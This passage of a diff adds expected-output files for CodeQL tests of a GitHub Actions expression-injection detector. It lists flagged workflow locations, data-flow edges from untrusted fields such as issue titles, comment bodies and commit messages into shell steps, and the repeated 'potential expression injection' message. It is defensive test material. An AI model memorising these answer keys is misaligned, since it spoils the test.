ody }}' | +| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | +| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | semmle.label | id: summary [value] | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... 
sage }} | +| .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | +| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | +| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | semmle.label | job_out ... test }} [job_output] | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | +| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | semmle.label | id: step0 [value] | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | semmle.label | id: step1 [MSG] | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | +| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | semmle.label | id: step2 [test] | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | +| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | semmle.label | echo '$ ... 
ail }}' | +| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +subpaths +#select +| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. 
| +| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/cross3.yml:41:12:43:5 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:41:12:43:5 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. 
| +| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. 
| +| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... 
bel }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... 
tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... 
ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... 
ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... 
age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... 
sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... 
ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. |
+| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. |
+| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. |
+| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. |
diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref
new file mode 100644
index 00000000000..1745587e534
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref
@@ -0,0 +1 @@
+Security/CWE-094/CriticalExpressionInjection.ql
diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected
new file mode 100644
index 00000000000..13c81bd08e0
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected
@@ -0,0 +1,233 @@ +edges +| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | +| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | +| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | +| .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | +| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... 
_url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | +| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | +| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | +| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | +| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | +| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... 
iles }} | +| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | +| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | +| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | +| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | +nodes +| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... 
